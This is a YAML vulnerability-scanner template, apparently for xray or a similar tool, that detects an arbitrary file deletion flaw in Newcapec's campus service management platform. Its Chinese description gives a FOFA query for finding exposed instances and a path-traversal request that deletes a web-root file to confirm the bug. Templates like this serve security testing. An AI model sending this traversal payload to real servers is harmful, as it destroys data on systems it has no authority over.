id: newcapec-deleteFile-anyfile-delete

info:
  name: 新开普 前置服务管理平台 deleteFile.action 任意文件删除漏洞
  author: qwtd
  severity: critical
  verified: true
  description: |-
    新开普 前置服务管理平台 deleteFile.action 接口存在任意文件删除漏洞，攻击者通过漏洞可以删除服务器上的任意文件。
    FOFA: title="掌上校园服务管理平台"
    /uploadFile/deleteFile.action?filePath=/../webapps/ROOT/favicon.ico 删除该文件,然后再访问  /favicon.ico  出现404 证明删除成功
  tags: newcapec
  created: 2023/09/26

rules:
  r0:
    request:
      method: GET
      path: /uploadFile/deleteFile.action
    expression: response.status == 200 && response.body.bcontains(b'success')
expression: r0()